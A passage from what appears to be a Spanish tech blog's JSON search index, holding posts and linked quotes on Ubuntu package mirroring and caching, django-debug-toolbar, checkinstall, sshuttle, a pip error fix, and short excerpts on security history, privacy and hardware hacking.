que acabamos de crear:\n#deb http://archive.ubuntu.com/ubuntu/ trusty main universe deb http://deb.example.com/ubuntu/ trusty main universe Como comentario, las fuentes relativas a actualizaciones de seguridad las dejaría como está, para que se sigan descargando desde los repositorios originales:\ndeb http://security.ubuntu.com/ubuntu trusty-security main restricted universe multiverse Sólo resta actualizar la lista de paquetes disponibles:\n$ sudo aptitude update Referencias » Creating an Ubuntu repository mirror with apt-mirror\n","permalink":"http://karpoke.ignaciocano.com/2014/05/18/crear-un-repositorio-espejo-de-ubuntu/","summary":"\u003cp\u003eSi tenemos un gran número de equipos con Ubuntu en nuestra LAN, nos\npuede interesar tener un espejo local del repositorio de paquetes de\nUbuntu. Una diferencia entre esta opción y \u003ca href=\"/2014/05/17/cache-de-paquetes-descargados-en-ubuntu-trusty-tahr/\"\u003eutilizar un \u003cem\u003eproxy/caché\u003c/em\u003e de\npaquetes\u003c/a\u003e es que, en el primer caso, ya tendremos todos los paquetes\ndisponibles cuando los vayamos a necesitar.\u003c/p\u003e\n\u003ch2 id=\"clonar-el-repositorio-en-local\"\u003eClonar el repositorio en local\u003c/h2\u003e\n\u003cp\u003ePara crear un repositorio local, podemos usar el comando \u003ccode\u003eapt-mirror\u003c/code\u003e,\ndisponible en los repositorios. Una vez instalado, podemos editar el\nfichero de configuración en \u003ccode\u003e/etc/apt/mirror.list\u003c/code\u003e para, por ejemplo,\ncambiar el directorio donde se guardarán los paquetes (por defecto\n\u003ccode\u003e/var/spool/apt-mirror\u003c/code\u003e), añadir o eliminar fuentes a incluir en el\nrepositorio, etc. Con las fuentes por defecto, hay que tener en cuenta\nque serán necesarios más de 100 GB para alojar el repositorio. Si\noptásemos sólo por incluir el \u0026ldquo;main\u0026rdquo;, se queda en 10 GB.\u003c/p\u003e","title":"Crear un repositorio espejo de Ubuntu"},{"content":"Si tenemos una LAN con varios equipos, podemos utilizar apt-cacher-ng para no tener que descargar las actualizaciones desde los repostiorios en cada uno de ellos, ya que nos permite reutilizar los paquetes que hayamos descargado. Otras opciones, como AptProxy parece que han quedado algo obsoletas.\napt-cacher-ng es un proxy/caché enfocado a gestores de paquetes, que soporta las distribuciones Debian y Ubuntu, entre otras. Es una buena alternativa a montar un espejo para pequeñas LANs.\nServidor El equipo en que se instale es el que hará de servidor y el resto serán los clientes. Se puede instalar desde los repositorios. Una vez instalado, editaremos el fichero /etc/services para añadir los puertos que utiliza (esto no será útil cuando, por ejemplo, analicemos el tráfico de red):\n# Local services apt-cacher-ng 3142/tcp apt-cacher-ng 3142/udp Para arrancar el servicio:\n$ sudo service apt-cacher-ng start Si tenemos un cortafuegos activo, deberemos abrir dicho puerto. Por ejemplo, si usamos ufw:\n$ sudo ufw allow from 192.168.0.0/24 to any port 3142 Podemos importar los paquetes que ya tengamos descargados. Tal como sugiere la documentación en la página de mantenimiento, creamos el directorio _import, añadimos un enlace simbólico a la caché de paquetes de apt y pulsamos en el botón de importar:\n$ cd /var/cache/apt-cacher-ng/ $ sudo mkdir _import $ sudo chown apt-cacher-ng:apt-cacher-ng _import/ $ cd _import/ $ sudo ln -s /var/cache/apt/archives Ahora sólo queda pulsar en el botón de Importar, o visitar el siguiente enlace:\n$ w3m \u0026#34;http://192.168.0.50:3142/acng-report.html?abortOnErrors=aOe\u0026amp;doImport=Start+Import\u0026amp;calcSize=cs\u0026amp;asNeeded=an#bottom\u0026#34; Clientes En los clientes, lo único que hay que hacer es añadir un archivo de configuración para apt, por ejemplo /etc/apt/apt.conf.d/02proxy que apunte al servidor:\nAcquire::http::Proxy \u0026#34;http://192.168.0.50:3142\u0026#34;; 192.168.0.50 es la IP del servidor, aunque también podríamos poner un nombre de dominio.\nSólo queda actualizar los paquetes:\n$ sudo aptitude update Mantenimiento En la URL http://192.168.0.50:3142/acng-report.html nos muestra una página donde se pueden ver algunas estadísticas y realizar algunas acciones, como vaciar la caché.\nReferencias » apt-cacher-ng » Apt-Cacher-NG User Manual » Install Apt-Cacher-NG – Ubuntu\n","permalink":"http://karpoke.ignaciocano.com/2014/05/17/cache-de-paquetes-descargados-en-ubuntu-trusty-tahr/","summary":"\u003cp\u003eSi tenemos una LAN con varios equipos, podemos utilizar \u003ccode\u003eapt-cacher-ng\u003c/code\u003e\npara no tener que descargar las actualizaciones desde los repostiorios\nen cada uno de ellos, ya que nos permite reutilizar los paquetes que\nhayamos descargado. Otras opciones, como AptProxy parece que han quedado\nalgo obsoletas.\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003eapt-cacher-ng\u003c/code\u003e es un \u003cem\u003eproxy/caché\u003c/em\u003e enfocado a gestores de paquetes, que\nsoporta las distribuciones Debian y Ubuntu, entre otras. Es una buena\nalternativa a montar un espejo para pequeñas LANs.\u003c/p\u003e","title":"Caché de paquetes descargados en Ubuntu Trusty Tahr"},{"content":"django-debug-toolbar es una aplicación para Django que nos muestra información de depuración acerca de las diferentes peticiones y respuestas que se llevan a cabo en el servidor: variables de contexto, cabeceras, peticiones SQL, etc.\nSin embargo, hay algunas URLs para las cuales nos puede interesar que no se analicen, como por ejemplo, peticiones que se hagan por Ajax o URLs relativas a diversas aplicaciones instaladas, como el panel de administración, Rosetta, etc.\nUna forma sencilla de lograr esto es utilizando la variable de configuración SHOW_TOOLBAR_CALLBACK, la cual debe apuntar a la función que determine si se debe mostrar la barra o no (por defecto, se comprueba el valor de la variable DEBUG).\nPor ejemplo, si no queremos mostrar la barra para diferentes URLs, hasta la versión 1.0, podemos hacer lo siguiente:\ndef show_toolbar(request): for url in DEBUG_TOOLBAR_CONFIG[\u0026#34;IGNORE_URIS\u0026#34;]: if re.search(url, request.path): return False return True DEBUG_TOOLBAR_CONFIG = { \u0026#39;IGNORE_URIS\u0026#39;: ( \u0026#39;^/admin\u0026#39;, \u0026#39;^/rosetta\u0026#39;, ), \u0026#39;SHOW_TOOLBAR_CALLBACK\u0026#39;: show_toolbar, } A partir de la versión 1.0, el nombre de la función se debe especificar como una ruta separada por puntos:\n\u0026#39;SHOW_TOOLBAR_CALLBACK\u0026#39;: \u0026#39;projectname.settings.show_toolbar\u0026#39;, ","permalink":"http://karpoke.ignaciocano.com/2014/05/15/exclusion-de-urls-cuando-usamos-django-debug-toolbar/","summary":"\u003cp\u003e\u003ca href=\"http://github.com/django-debug-toolbar/django-debug-toolbar\"\u003edjango-debug-toolbar\u003c/a\u003e es una aplicación para Django que nos muestra\ninformación de depuración acerca de las diferentes peticiones y\nrespuestas que se llevan a cabo en el servidor: variables de contexto,\ncabeceras, peticiones SQL, etc.\u003c/p\u003e\n\u003cp\u003eSin embargo, hay algunas URLs para las cuales nos puede interesar que no\nse analicen, como por ejemplo, peticiones que se hagan por Ajax o URLs\nrelativas a diversas aplicaciones instaladas, como el panel de\nadministración, Rosetta, etc.\u003c/p\u003e","title":"Exclusión de URLs cuando usamos django-debug-toolbar"},{"content":"Una forma sencilla de crear un paquete .deb a partir del código fuente es mediante la utilidad checkinstall, disponible en los respositorios.\nPara aquellos casos en los que la compilación del código y la instalación sigue los conocidos comandos:\n$ ./configure $ make $ sudo make install Bastará sustituir el último paso por:\n$ sudo checkinstall Como ejemplo, podemos crear un .deb a partir del código fuente de libsodium, una librería necesaria para compilar dnscrypt.\nDescargamos la última versión y comprobamos la firma:\n$ wget https://download.libsodium.org/libsodium/releases/libsodium-0.4.5.tar.gz $ dig +dnssec +short txt libsodium-0.4.5.tar.gz.download.libsodium.org \u0026#34;7ad5202df53eeac0eb29b064ae5d05b65d82b2fc1c082899c9c6a09b0ee1ac32\u0026#34; $ shasum -a 256 libsodium-0.4.2.tar.gz 7ad5202df53eeac0eb29b064ae5d05b65d82b2fc1c082899c9c6a09b0ee1ac32 libsodium-0.4.5.tar.gz (Otra opción sería comprobar el fichero .sig disponible también para descargar desde su página.)\nDescomprimimos el fichero y lo compilamos:\n$ tar xzf libsodium-0.4.5.tar.gz $ cd libsodium-0.4.5/ $ ./configure $ make -j2 $ make check Ahora es cuando creamos el paquete .deb:\n$ sudo checkinstall Nos pedirá que añadamos una pequeña descripción del paquete y que confirmemos una serie de datos relacionados con el mismo. Si quisiéramos apadrinar un paquete, sería tan sencillo como poner nuestro nombre, forma de contacto y dirección de descarga.\ncheckinstall 1.6.2, Copyright 2009 Felipe Eduardo Sanchez Diaz Duran Este software es distribuído de acuerdo a la GNU GPL The package documentation directory ./doc-pak does not exist. Should I create a default set of package docs? [y]: n Por favor escribe una descripción para el paquete. Termina tu descripcion con una linea vacia o con EOF. \u0026gt;\u0026gt; libsodium is an easy-to-use crypto library. Its goal is to provide all of the core operations needed to build higher-level cryptographic tools. \u0026gt;\u0026gt; ***************************************** **** Debian package creation selected *** ***************************************** Este paquete será creado de acuerdo a estos valores: 0 - Maintainer: [ nacho AT ignaciocano DOT com ] 1 - Summary: [ libsodium is an easy-to-use crypto library. Its goal is to provide all of the core operations needed to build higher-level cryptographic tools. ] 2 - Name: [ libsodium ] 3 - Version: [ 0.4.5 ] 4 - Release: [ 1 ] 5 - License: [ GPL ] 6 - Group: [ checkinstall ] 7 - Architecture: [ i386 ] 8 - Source location: [ libsodium-0.4.5 ] 9 - Alternate source location: [ ] 10 - Requires: [ ] 11 - Provides: [ libsodium ] 12 - Conflicts: [ ] 13 - Replaces: [ ] Introduce un número para cambiar algún dato u oprime ENTER para continuar: Si todo ha ido bien, ya tendremos el paquete creado e instalado. Si quisiéramos eliminarlo:\n$ sudo dpkg -r libsodium Actualizado el 26 de abril de 2015 Si no queremos que se instale justo después de crear el paquete, tenemos varias opciones:\nUtilizar el argumento --install=no Editar el fichero de configuración /etc/checkinstallrc y cambiar `INSTALL=1` por `INSTALL=0` Alternativamente, podemos crear el paquete de forma automatizada, pasando la información en forma de argumentos. Por ejemplo:\n$ sudo checkinstall --default \\ --install=no \\ --maintainer=\u0026#34;nacho AT ignaciocano DOT com\u0026#34; \\ --pkgname=libsodium \\ --pkgversion=0.4.5 \\ --pkgrelease=1 \\ --pkglicense=GPL \\ --pkggroup=checkinstall \\ --pkgarch=i386 \\ --pkgsource=libsodium-0.4.5 \\ --pkgaltsource= \\ --requires= \\ --provides=libsodium La descripción del paquete se toma del contenido del fichero description-pak, que deberemos crear previamente.\nPodemos comprobar la información del paquete mediante dpkg -I (o rpm -qi si es un .rpm):\n$ dpkg -I libsodium_0.4.5-1_i386.deb paquete debian nuevo, versión 2.0. tamaño 388804 bytes: archivo de control= 383 bytes. 0 bytes, 0 líneas conffiles 332 bytes, 9 líneas control Package: libsodium Priority: extra Section: checkinstall Installed-Size: 2492 Maintainer: nacho AT ignaciocano DOT com Architecture: i386 Version: 0.4.5-1 Provides: libsodium Description: libsodium is an easy-to-use crypto library. Its goal is to provide all of the core operations needed to build higher-level cryptographic tools. Ya que estamos, también he creado un .deb para dnscrypt. Si queréis ahorraros el trabajo, aquí tenéis ambos paquetes .deb:\n» libsodium_0.4.5-1_i386.deb » dnscrypt-proxy_1.4.0-1_i386.deb\nReferencias » Checkinstall, crear paquetes .deb fácilmente a partir del código » How to compile and install DNScrypt » Checkinstall README\n","permalink":"http://karpoke.ignaciocano.com/2014/05/10/crear-paquetes-deb-con-checkinstall/","summary":"\u003cp\u003eUna forma sencilla de crear un paquete .deb a partir del código fuente\nes mediante la utilidad \u003ccode\u003echeckinstall\u003c/code\u003e, disponible en los respositorios.\u003c/p\u003e\n\u003cp\u003ePara aquellos casos en los que la compilación del código y la\ninstalación sigue los conocidos comandos:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ ./configure\n$ make\n$ sudo make install\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eBastará sustituir el último paso por:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ sudo checkinstall\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eComo ejemplo, podemos crear un .deb a partir del código fuente de\n\u003ca href=\"https://download.libsodium.org/libsodium/releases/\"\u003elibsodium\u003c/a\u003e, una librería necesaria para compilar dnscrypt.\u003c/p\u003e","title":"Crear paquetes .deb con checkinstall"},{"content":" This past semester I’ve been working on a directed study at my university with Prof. Wil Robertson reverse engineering embedded devices. After a couple of months looking at a passport scanner, one of my friends jokingly suggested I hack a Furby, the notoriously annoying toy of late 1990s fame. Everyone laughed, and we all moved on with our lives.\nHowever, the joke didn’t stop there. Within two weeks, this same friend said they had a present for me. And that’s how I started reverse engineering a Furby.\n» Michael Coppola | poppopret.org\n","permalink":"http://karpoke.ignaciocano.com/2014/01/18/reverse-engineering-a-furby/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThis past semester I’ve been working on a directed study at my university\nwith Prof. Wil Robertson reverse engineering embedded devices. After a couple\nof months looking at a passport scanner, one of my friends jokingly suggested\nI hack a Furby, the notoriously annoying toy of late 1990s fame. Everyone\nlaughed, and we all moved on with our lives.\u003c/p\u003e\n\u003cp\u003eHowever, the joke didn’t stop there. Within two weeks, this same friend said\nthey had a present for me. And that’s how I started reverse engineering a\nFurby.\u003c/p\u003e","title":"Reverse Engineering a Furby"},{"content":" I found that the rollover text, “/bu|[rn]t|[coy]e|[mtg]a|j|iso|n[hl]|[ae]d|lev|sh|[lnd]i|[po]o|ls/ matches the last names of elected US presidents but not their opponents.”, is obviously false. After all there are several last names (like “Nixon” and “Bush”) that denote both elected presidents and opponents. So no regular expression could both match and not match “Nixon”.\nSo that got me thinking: if we ignore names that are both winners and losers, what regular expression does cover the winners and not the losers? And let’s try to find a short one, although perhaps not the very shortest.\n» nbviewer.ipython.org\n","permalink":"http://karpoke.ignaciocano.com/2014/01/07/xkcd-1313-something-is-wrong-on-the-internet/","summary":"\u003cblockquote\u003e\n\u003cp\u003eI found that the rollover text,\n“\u003ccode\u003e/bu|[rn]t|[coy]e|[mtg]a|j|iso|n[hl]|[ae]d|lev|sh|[lnd]i|[po]o|ls/\u003c/code\u003e matches\nthe last names of elected US presidents but not their opponents.”, is\nobviously false. After all there are several last names (like “Nixon” and\n“Bush”) that denote both elected presidents and opponents. So no regular\nexpression could both match and not match “Nixon”.\u003c/p\u003e\n\u003cp\u003eSo that got me thinking: if we ignore names that are both winners and losers,\nwhat regular expression does cover the winners and not the losers? And let’s\ntry to find a short one, although perhaps not the very shortest.\u003c/p\u003e","title":"xkcd 1313: Something is Wrong on the Internet!"},{"content":" Hubo un tiempo en que sólo había un camino para surcar las redes: la Compañía Telefónica Nacional de España. Y una sola pensamiento profundo de los hackers: engañarla para surcar estas redes sin pagar nada. Entonces cogió gran importancia una especialidad, dentro de las artes del hacking, llamada ’phreaking’ (http://hackstory.net/phreaking), contracción de ’phone’ (teléfono) y ’freak’ (monstruo). Los ’phreakers’ tienen gran conocimiento de las líneas telefónicas y saben, entre otras cosas, como usarlas para llamar gratis. En los años 80 y 90 no había grupo de hackers que no contase entre sus filas con uno o más buenos ’phreakers’.\n» Mercé Molist | elmundo.es\n","permalink":"http://karpoke.ignaciocano.com/2014/01/07/un-ejercito-de-frikis-contra-telefonica/","summary":"\u003cblockquote\u003e\n\u003cp\u003eHubo un tiempo en que sólo había un camino para surcar las redes: la\nCompañía Telefónica Nacional de España. Y una sola pensamiento profundo de los\nhackers: engañarla para surcar estas redes sin pagar nada. Entonces\ncogió gran importancia una especialidad, dentro de las artes del\nhacking, llamada ’phreaking’ (\u003ca href=\"http://hackstory.net/phreaking)\"\u003ehttp://hackstory.net/phreaking)\u003c/a\u003e,\ncontracción de ’phone’ (teléfono) y ’freak’ (monstruo). Los\n’phreakers’ tienen gran conocimiento de las líneas telefónicas y\nsaben, entre otras cosas, como usarlas para llamar gratis. En los años\n80 y 90 no había grupo de hackers que no contase entre sus filas con\nuno o más buenos ’phreakers’.\u003c/p\u003e","title":"Un ejército de ’frikis’ contra Telefónica"},{"content":" If you’re an Ubuntu user and you’re using the default settings, each time you start typing in Dash (to open an application or search for a file on your computer), your search terms get sent to a variety of third parties, some of which advertise to you.\nUbuntu should protect user privacy by default. Since it doesn’t, you can use the code to the left to disable the parts of Ubuntu which are invasive to your privacy.\n» fixubuntu.com\n","permalink":"http://karpoke.ignaciocano.com/2013/12/15/fix-ubuntu/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIf you’re an Ubuntu user and you’re using the default settings, each\ntime you start typing in Dash (to open an application or search for a\nfile on your computer), your search terms get sent to a variety of\nthird parties, some of which advertise to you.\u003c/p\u003e\n\u003cp\u003eUbuntu should protect user privacy by default. Since it doesn’t, you\ncan use the code to the left to disable the parts of Ubuntu which are\ninvasive to your privacy.\u003c/p\u003e","title":"fix ubuntu"},{"content":" A finales de 1983 la compañía Nintendo sacó al mercado la consola FAMICOM en Japón, a los pocos años se comercializó también por Europa y América bajo el nombre de NES. Para celebrar sus treinta años de existencia algunos entusiastas han decidido no quedarse de brazos cruzados y le han hecho un merecido homenaje, usándola para componer un CD de música que se distribuye de manera gratuita bajo licencia Creative Commons.\n» sawsquarenoise.com\n","permalink":"http://karpoke.ignaciocano.com/2013/12/15/album-para-celebrar-los-30-anos-de-la-famicomnes/","summary":"\u003cblockquote\u003e\n\u003cp\u003eA finales de 1983 la compañía Nintendo sacó al mercado la consola\nFAMICOM en Japón, a los pocos años se comercializó también por Europa\ny América bajo el nombre de NES. Para celebrar sus treinta años de\nexistencia algunos entusiastas han decidido no quedarse de brazos\ncruzados y le han hecho un merecido homenaje, usándola para componer\nun CD de música que se distribuye de manera gratuita bajo licencia\nCreative Commons.\u003c/p\u003e","title":"Álbum para celebrar los 30 años de la FAMICOM/NES"},{"content":" El cumplimiento de la ecuación de Moore ha sido posible hasta la fecha gracias a la reducción constante del tamaño y el precio de los chips, unido al aumento de su potencia de cálculo. Sin embargo, los límites de la física están comenzando a imponerse sobre los pronósticos de Moore.\n» David Pérez | elconfidencial.com\n","permalink":"http://karpoke.ignaciocano.com/2013/11/18/este-es-el-hombre-que-terminara-por-destruir-silicon-valley/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEl cumplimiento de la ecuación de Moore ha sido posible hasta la fecha\ngracias a la reducción constante del tamaño y el precio de los chips,\nunido al aumento de su potencia de cálculo. Sin embargo, los límites\nde la física están comenzando a imponerse sobre los pronósticos de\nMoore.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» David Pérez | \u003ca href=\"http://www.elconfidencial.com/tecnologia/2013-11-16/este-es-el-hombre-que-terminara-por-destruir-silicon-valley_55203/\"\u003eelconfidencial.com\u003c/a\u003e\u003c/p\u003e","title":"Este es el hombre que terminará por destruir Silicon Valley"},{"content":" Llevamos unos días en los que nos hemos enterado vía twitter de grandes pérdidas para la comunidad de seguridad informática a nivel mundial. Los más recientes, y en muy poco espacio de tiempo, Cédric Blancher y Péter Sz¶r (este último, hace un par de días, el 12 de Noviembre).\n» José A. Guasch | securitybydefault.com\n","permalink":"http://karpoke.ignaciocano.com/2013/11/17/descansad-en-paz-hackers/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLlevamos unos días en los que nos hemos enterado vía twitter de\ngrandes pérdidas para la comunidad de seguridad informática a nivel\nmundial. Los más recientes, y en muy poco espacio de tiempo, Cédric\nBlancher y Péter Sz¶r (este último, hace un par de días, el 12 de\nNoviembre).\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» José A. Guasch | \u003ca href=\"http://www.securitybydefault.com/2013/11/descansad-en-paz-hackers.html\"\u003esecuritybydefault.com\u003c/a\u003e\u003c/p\u003e","title":"Descansad en paz, hackers."},{"content":" The good people from Barracuda Labs were kind enough to share a PCAP file from the PHP.net compromize on their blog.\nI decided to have a closer look at that PCAP file to see what can be extracted from it. Since the PCAP contains Windows malware I played safe and did all the analysis on a Linux machine with no Internet connectivity.\n» Erik Hjelmvik | netresec.com\n","permalink":"http://karpoke.ignaciocano.com/2013/11/05/command-line-forensics-of-hacked-php-net/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe good people from Barracuda Labs were kind enough to share a PCAP\nfile from the PHP.net compromize on their blog.\u003c/p\u003e\n\u003cp\u003eI decided to have a closer look at that PCAP file to see what can be\nextracted from it. Since the PCAP contains Windows malware I played\nsafe and did all the analysis on a Linux machine with no Internet\nconnectivity.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Erik Hjelmvik | \u003ca href=\"http://www.netresec.com/?page=Blog\u0026amp;month=2013-10\u0026amp;post=Command-line-Forensics-of-hacked-PHP-net\"\u003enetresec.com\u003c/a\u003e\u003c/p\u003e","title":"Command-line Forensics of hacked PHP.net"},{"content":" Feel like someone is snooping on you? Browse anonymously anywhere you go with the Onion Pi Tor proxy. This is fun weekend project that uses a Raspberry Pi, a USB WiFi adapter and Ethernet cable to create a small, low-power and portable privacy Pi.\nUsing it is easy-as-pie. First, plug the Ethernet cable into any Internet provider in your home, work, hotel or conference/event. Next, power up the Pi with the micro USB cable to your laptop or to the wall adapter. The Pi will boot up and create a new secure wireless access point called Onion Pi. Connecting to that access point will automatically route any web browsing from your computer through the anonymizing Tor network.\n» Ladyada | adafruit.com\n","permalink":"http://karpoke.ignaciocano.com/2013/11/04/make-a-raspberry-pi-into-a-anonymizing-tor-proxy/","summary":"\u003cblockquote\u003e\n\u003cp\u003eFeel like someone is snooping on you? Browse anonymously anywhere you\ngo with the Onion Pi Tor proxy. This is fun weekend project that uses\na Raspberry Pi, a USB WiFi adapter and Ethernet cable to create a\nsmall, low-power and portable privacy Pi.\u003c/p\u003e\n\u003cp\u003eUsing it is easy-as-pie. First, plug the Ethernet cable into any\nInternet provider in your home, work, hotel or conference/event. Next,\npower up the Pi with the micro USB cable to your laptop or to the wall\nadapter. The Pi will boot up and create a new secure wireless access\npoint called Onion Pi. Connecting to that access point will\nautomatically route any web browsing from your computer through the\nanonymizing Tor network.\u003c/p\u003e","title":"Make a Raspberry Pi into a Anonymizing Tor Proxy!"},{"content":" FreeNAS es un sistema operativo basado en FreeBSD pero orientado a servicios de almacenamiento en red. NAS corresponde a las siglas de ”almacenamiento conectado en red”.\nFreeNAS y su fork Nas4Free son gratuitos, Nas4Free es open-source basado en licencia BSD. Estos sistemas operativos permiten crear un servidor doméstico muy potente con multitud de opciones de configuración como por ejemplo administración de decenas de usuarios con los permisos adecuados, crear unidades RAID para hacer copias de seguridad redundantes o aumentar el rendimiento del sistema.\n» redeszone.net\n","permalink":"http://karpoke.ignaciocano.com/2013/11/03/freenas/","summary":"\u003cblockquote\u003e\n\u003cp\u003eFreeNAS es un sistema operativo basado en FreeBSD pero orientado a\nservicios de almacenamiento en red. NAS corresponde a las siglas de\n”almacenamiento conectado en red”.\u003c/p\u003e\n\u003cp\u003eFreeNAS y su fork Nas4Free son gratuitos, Nas4Free es open-source\nbasado en licencia BSD. Estos sistemas operativos permiten crear un\nservidor doméstico muy potente con multitud de opciones de\nconfiguración como por ejemplo administración de decenas de usuarios\ncon los permisos adecuados, crear unidades RAID para hacer copias de\nseguridad redundantes o aumentar el rendimiento del sistema.\u003c/p\u003e","title":"FreeNAS"},{"content":" El bicho explotaba vulnerabilidades en distintos servicios, como un fallo en el modo debug de sendmail, un buffer overflow en fingerd y una incorrecta configuración del rsh/rexec que permitía saltar entre equipos sin validación. Además de los clásicos usuarios y contraseñas débiles.\n» Alejandro Ramos | securitybydefault.com\n","permalink":"http://karpoke.ignaciocano.com/2013/11/02/25-anos-del-gusano-de-morris/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEl bicho explotaba vulnerabilidades en distintos servicios, como un\nfallo en el modo debug de sendmail, un buffer overflow en fingerd y\nuna incorrecta configuración del rsh/rexec que permitía saltar entre\nequipos sin validación. Además de los clásicos usuarios y contraseñas\ndébiles.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Alejandro Ramos | \u003ca href=\"http://www.securitybydefault.com/2013/11/25-anos-del-gusano-morris.html\"\u003esecuritybydefault.com\u003c/a\u003e\u003c/p\u003e","title":"25 años del gusano de Morris"},{"content":"shuttle es una herramienta que nos permite redirigir todo el tráfico a través de una conexión SSH, incluyendo las peticiones DNS. Está disponible tanto en los repositorios como en GitHub.\nSu uso es sencillo. Para establecer la conexión:\n$ sshuttle --D --pidfile=/tmp/sshuttle.pid -r user@server:1234 --dns 0/0 Para terminarla:\n$ kill $(cat /tmp/sshuttle.pid) ","permalink":"http://karpoke.ignaciocano.com/2013/10/20/sshuttle-la-vpn-de-los-pobres/","summary":"\u003cp\u003e\u003ca href=\"https://github.com/apenwarr/sshuttle\"\u003eshuttle\u003c/a\u003e es una herramienta que nos permite redirigir todo el tráfico\na través de una conexión SSH, incluyendo las peticiones DNS. Está\ndisponible tanto en los repositorios como en GitHub.\u003c/p\u003e\n\u003cp\u003eSu uso es sencillo. Para establecer la conexión:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ sshuttle --D --pidfile=/tmp/sshuttle.pid -r user@server:1234 --dns 0/0\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003ePara terminarla:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ kill $(cat /tmp/sshuttle.pid)\n\u003c/code\u003e\u003c/pre\u003e","title":"sshuttle, la VPN de los pobres"},{"content":" So you learned the base id, class, and descendant selectors – and then called it a day? If so, you’re missing out on an enormous level of flexibility. While many of the selectors mentioned in this article are part of the CSS3 spec, and are, consequently, only available in modern browsers, you owe it to yourself to commit these to memory.\n» Jeffrey Way | tutsplus.com\n","permalink":"http://karpoke.ignaciocano.com/2013/10/13/the-30-css-selectors-you-must-memorize/","summary":"\u003cblockquote\u003e\n\u003cp\u003eSo you learned the base id, class, and descendant selectors – and then\ncalled it a day? If so, you’re missing out on an enormous level of\nflexibility. While many of the selectors mentioned in this article are\npart of the CSS3 spec, and are, consequently, only available in modern\nbrowsers, you owe it to yourself to commit these to memory.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Jeffrey Way | \u003ca href=\"http://net.tutsplus.com/tutorials/html-css-techniques/the-30-css-selectors-you-must-memorize/\"\u003etutsplus.com\u003c/a\u003e\u003c/p\u003e","title":"The 30 CSS Selectors you Must Memorize"},{"content":"Si al ejecutar pip, nos aparece el siguiente error:\n$ pip Traceback (most recent call last): File \u0026#34;/usr/local/bin/pip\u0026#34;, line 5, in from pkg_resources import load_entry_point File \u0026#34;/usr/lib/python2.7/dist-packages/pkg_resources.py\u0026#34;, line 2707, in working_set.require(__requires__) File \u0026#34;/usr/lib/python2.7/dist-packages/pkg_resources.py\u0026#34;, line 686, in require needed = self.resolve(parse_requirements(requirements)) File \u0026#34;/usr/lib/python2.7/dist-packages/pkg_resources.py\u0026#34;, line 584, in resolve raise DistributionNotFound(req) pkg_resources.DistributionNotFound: pip==1.1 puede ser debido a que es necesario actualizar el propio pip:\n$ sudo easy_install --upgrade pip Searching for pip Reading http://pypi.python.org/simple/pip/ Best match: pip 1.4 Downloading https://pypi.python.org/packages/source/p/pip/pip-1.4.tar.gz#md5=ca790be30004937987767eac42cfa44a Processing pip-1.4.tar.gz Running pip-1.4/setup.py -q bdist_egg --dist-dir /tmp/easy_install-XSmFvr/pip-1.4/egg-dist-tmp-jmeGZW warning: no files found matching \u0026#39;*.html\u0026#39; under directory \u0026#39;docs\u0026#39; warning: no previously-included files matching \u0026#39;*.rst\u0026#39; found under directory \u0026#39;docs/_build\u0026#39; no previously-included directories found matching \u0026#39;docs/_build/_sources\u0026#39; Adding pip 1.4 to easy-install.pth file Installing pip script to /usr/local/bin Installing pip-2.7 script to /usr/local/bin Installed /usr/local/lib/python2.7/dist-packages/pip-1.4-py2.7.egg Processing dependencies for pip Finished processing dependencies for pip Comprobamos que se ha solucionado:\n$ pip Usage: pip [options] Commands: install Install packages. uninstall Uninstall packages. freeze Output installed packages in requirements format. list List installed packages. show Show information about installed packages. search Search PyPI for packages. wheel Build wheels from your requirements. zip Zip individual packages. unzip Unzip individual packages. bundle Create pybundles. help Show help for commands. General Options: -h, --help Show help. -v, --verbose Give more output. Option is additive, and can be used up to 3 times. -V, --version Show version and exit. -q, --quiet Give less output. --log Log file where a complete (maximum verbosity) record will be kept. --proxy Specify a proxy in the form [user:passwd@]proxy.server:port. --timeout Set the socket timeout (default 15 seconds). --exists-action Default action when a path already exists: (s)witch, (i)gnore, (w)ipe, (b)ackup. --cert Path to alternate CA bundle. Referencias » stackoverflow.com\n","permalink":"http://karpoke.ignaciocano.com/2013/07/28/solucionado-el-error-distributionnotfound-al-usar-pip/","summary":"\u003cp\u003eSi al ejecutar \u003ccode\u003epip\u003c/code\u003e, nos aparece el siguiente error:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ pip\nTraceback (most recent call last):\n  File \u0026#34;/usr/local/bin/pip\u0026#34;, line 5, in\n    from pkg_resources import load_entry_point\n  File \u0026#34;/usr/lib/python2.7/dist-packages/pkg_resources.py\u0026#34;, line 2707, in\n    working_set.require(__requires__)\n  File \u0026#34;/usr/lib/python2.7/dist-packages/pkg_resources.py\u0026#34;, line 686, in require\n    needed = self.resolve(parse_requirements(requirements))\n  File \u0026#34;/usr/lib/python2.7/dist-packages/pkg_resources.py\u0026#34;, line 584, in resolve\n    raise DistributionNotFound(req)\npkg_resources.DistributionNotFound: pip==1.1\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003epuede ser debido a que es necesario actualizar el propio \u003ccode\u003epip\u003c/code\u003e:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ sudo easy_install --upgrade pip\nSearching for pip\nReading http://pypi.python.org/simple/pip/\nBest match: pip 1.4\nDownloading https://pypi.python.org/packages/source/p/pip/pip-1.4.tar.gz#md5=ca790be30004937987767eac42cfa44a\nProcessing pip-1.4.tar.gz\nRunning 